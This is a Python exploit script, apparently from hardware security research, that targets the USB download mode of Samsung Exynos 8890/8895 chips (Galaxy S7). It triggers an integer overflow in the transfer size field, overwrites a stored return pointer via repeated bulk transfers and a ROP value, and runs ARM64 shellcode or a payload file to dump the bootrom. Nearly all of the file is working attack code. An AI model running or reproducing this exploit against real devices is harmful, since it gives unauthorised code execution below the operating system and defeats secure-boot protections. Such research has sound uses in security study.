Samsung_S7/source/exploit.py

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Python
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import usb.core
import usb.util
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import struct, sys, usb1, libusb1, ctypes, usb
from keystone import *
from capstone import *
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# from ghidra_assistant.utils.utils import *
def p32(x):
return struct.pack("<I", x)
def p8(x):
return struct.pack("<B", x)
def p16(x):
return struct.pack("<H", x)
def p64(x):
return struct.pack("<Q", x)
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BLOCK_SIZE = 512
CHUNK_SIZE = 0xfffe00
MAX_PAYLOAD_SIZE = (BLOCK_SIZE - 10)
DL_BUFFER_START = 0x02021800
DL_BUFFER_SIZE = 0x4E800 #0x02070000 End
BOOTROM_START = 0x0
BOOTROM_SIZE = 0x20000 #128Kb
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TARGET_OFFSETS = {
# XFER_BUFFER, RA_PTR, XFER_END_SIZE
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"8890": (0x02021800, 0x02020F08, 0x02070000),
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"8895": (0x02021800, 0x02020F18, 0x02070000)
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}
ENDPOINT_BULK_IN = 0x81
ENDPOINT_BULK_OUT = 0x2
class ExynosDevice():
def __init__(self, idVendor=0x04e8, idProduct=0x1234):
"""Init with vendor/product IDs"""
self.idVendor = idVendor
self.idProduct = idProduct
self.target = "8890" # TODO auto detect device
self.connect_device()
def connect_device(self):
self.context = usb1.USBContext()
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while True:
self.handle = self.context.openByVendorIDAndProductID(
vendor_id=self.idVendor,
product_id=self.idProduct,
skip_on_error=True
)
if self.handle == None:
continue
break
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print("Connected device!")
def write(self, data, size=-1):
transfered = 0
transferred = ctypes.c_int()
if size == -1:
size = len(data)
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res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, data, len(data), ctypes.byref(transferred), 0)
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assert(res == 0)
return transfered
def send_empty_transfer(self):
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transfered = 0x200
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transferred = ctypes.c_int()
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res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, 0, 0, ctypes.byref(transferred), 0)
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assert(res == 0)
return transfered
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def test_bug_2(self):
# Also bug here
# payload = p32(1) + p32(CHUNK_SIZE + 0x2001) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0)
# self.write(payload, MAX_PAYLOAD_SIZE)
# self.write(b"\xaa" * CHUNK_SIZE, CHUNK_SIZE)
transferred = ctypes.c_int()
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bug_payload = p32(0) + p32(0x201 + 2 + MAX_PAYLOAD_SIZE + 0x7) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0)
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bug_payload += b"\xcc" * (BLOCK_SIZE - len(bug_payload))
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, bug_payload, len(bug_payload), ctypes.byref(transferred), 0)
assert res == 0
payload = b"\xaa" * 0x200
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
assert res == 0
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payload = b"\xaa" * 0x200
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res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
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while True:
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 10)
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pass
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def test_bug(self):
# Start by sending a valid packet
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# Integer overflow in the size field
# unk + size + payload + header
payload = p32(0) + p32(0xFDFDE7FF + 0x1000) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0)
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assert (len(payload) == BLOCK_SIZE)
self.write(payload, MAX_PAYLOAD_SIZE)
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for i in range(200):
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print(hex(self.send_empty_transfer()))
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print('Bug probably available')
sys.exit(0)
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def exploit(self, payload: bytes):
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current_offset = TARGET_OFFSETS[self.target][0]
transferred = ctypes.c_int()
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size_to_overflow = 0x100000000 - current_offset + TARGET_OFFSETS[self.target][1] + 8 + 6
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max_payload_size = 0x100000000 - size_to_overflow
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ram_size = ((size_to_overflow % CHUNK_SIZE) % BLOCK_SIZE)
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# max_payload_size = 0xffffffff - current_offset + DL_BUFFER_SIZE + TARGET_OFFSETS[self.target][1]
# max_payload_size = (TARGET_OFFSETS[self.target][2] - TARGET_OFFSETS[self.target][0]) - 0x200
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payload = payload + ((max_payload_size - len(payload)) * b"\x00")
assert len(payload) == max_payload_size, "Invalid payload"
# First send payload to trigger the bug
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bug_payload = p32(0) + p32(size_to_overflow) + payload[:MAX_PAYLOAD_SIZE] # dummy packet for triggering the bug
bug_payload += b"\xcc" * (BLOCK_SIZE - len(bug_payload))
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res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, bug_payload, len(bug_payload), ctypes.byref(transferred), 0)
assert res == 0, "Error triggering payload"
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assert transferred.value == len(bug_payload), "Invalid transfered size"
current_offset += len(bug_payload) - 8 # Remove header
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cnt = 0
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while True:
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if current_offset + CHUNK_SIZE >= TARGET_OFFSETS[self.target][1] and current_offset < TARGET_OFFSETS[self.target][1]:
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break
self.send_empty_transfer()
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current_offset += CHUNK_SIZE
cnt += 1
if current_offset > 0x100000000:
current_offset = current_offset - 0x100000000 #reset 32 byte integer
print(f"{cnt} {hex(current_offset)}")
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remaining = (TARGET_OFFSETS[self.target][1] - current_offset)
assert remaining != 0, "Invalid remaining, needs to be > 0 in order to overwrite with the last packet"
if remaining > BLOCK_SIZE:
self.send_empty_transfer()
# Send last transfer, TODO who aligns this ROM??
current_offset += ((remaining // BLOCK_SIZE) * BLOCK_SIZE)
cnt += 1
print(f"{cnt} {hex(current_offset)}")
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# Build ROP chain.
rop_chain = (b"\x00" * (ram_size - 6)) + p64(TARGET_OFFSETS[self.target][0]) + (b"\x00" * 2)
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transferred = ctypes.c_int(0)
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res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, rop_chain, len(rop_chain), ctypes.byref(transferred), 0)
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assert res == 0, "Error sending ROP chain"
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# Send some data
p = b"\xaa" * 0x200
transferred.value = 0
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, p, len(p), ctypes.byref(transferred), 100)
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assert res == 0, "Error sending data"
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buf = ctypes.c_buffer(b"", 0x20000)
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, 0x81, buf, len(buf), ctypes.byref(transferred), 100)
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# Should have received some bytes
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pass
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ks = Ks(KS_ARCH_ARM64, KS_MODE_LITTLE_ENDIAN)
def usb_debug():
shellcode = f"""
start:
adr x0, test_fun
ldr x0, [x0]
blr x0
mov w1, #0x20000 // size
mov w0, #0x0 // address
bl usb_send
mov x0, #0
br x0 //reset
#Setup read usb
mov w0, #0x2
adr x1, shellcode_base
ldr x1, [x1]
mov w2, #0x02020000
add w2, w2, #0x2000
# endpoint, cb, buffer
adr x5, maybe_usb_setup_read
ldr x5, [x5]
blr x5
# Get something?? arg0 is endpoint
mov w0, #0x2
adr x1, maybe_read_size_endpoint
ldr x1, [x1]
blr x1
# # Send some data from ROM
# mov w1, #0x200 // size
# mov w0, #0x0 // address
# bl usb_send
# mov x0, #0
# br x0 //reset
# # dwc3_ep0_start_trans
# mov w1, w0
# mov w0, #0x2
# mov w2, #0x200
# adr x5, dwc3_ep0_start_trans
# ldr x5, [x5]
# blr x5
# # Send some data from ROM
# mov w1, #0x200 // size
# mov w0, #0x0 // address
# bl usb_send
# mov x0, #0
# br x0 //reset
usb_send:
stp x29, x30, [sp,#-48]!
mov w3, #0x0
bfxil w3, w1, #0, #24
mov w1, #0xc12
mov x29, sp
stp x19, x20, [sp,#16]
mov x5, #0xc834
mov w20, #0x1
movk x5, #0x1540, lsl #16
ldr x2, [x29,#40]
mov x4, #0xc838
orr w6, w1, w20
movk x4, #0x1540, lsl #16
mov x19, #0xc83c
movk x19, #0x1540, lsl #16
stp w3, w1, [x2,#8]
mov w3, #0x406
stp w0, wzr, [x2]
mov w0, w20
ldr x1, [x29,#40]
strb w6, [x2,#12]
mov x2, #0x27c8
str w1, [x5]
mov w1, #0x1388
str wzr, [x4]
str w3, [x19]
blr x2
mov w0, w20
ldr w1, [x19]
ldp x19, x20, [sp,#16]
ldp x29, x30, [sp],#48
ret
usb_read_endpoint: .quad 0x00006654
maybe_usb_setup_read: .quad 0x00006f88
shellcode_base: .quad 0x02021800
maybe_read_size_endpoint: .quad 0x00007a7c
dwc3_ep0_start_trans: .quad 0x0000791c
test_fun: .quad 0x000064e0
"""
shellcode = ks.asm(shellcode, as_bytes=True)[0]
shellcode = open("dwc3.bin", "rb").read()
exynos = ExynosDevice()
exynos.exploit(shellcode)
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if __name__ == "__main__":
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usb_debug()
sys.exit(0)
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# wait_for_device()
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exynos = ExynosDevice()
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exynos.test_bug_2()
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sys.exit(0)
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path = "dump/exynos-usbdl/payloads/Exynos8890_dump_bootrom.bin"
# path = "/home/eljakim/Source/gupje/source/bin/samsung_s7/debugger.bin"
exynos.exploit(open(path, "rb").read())
pass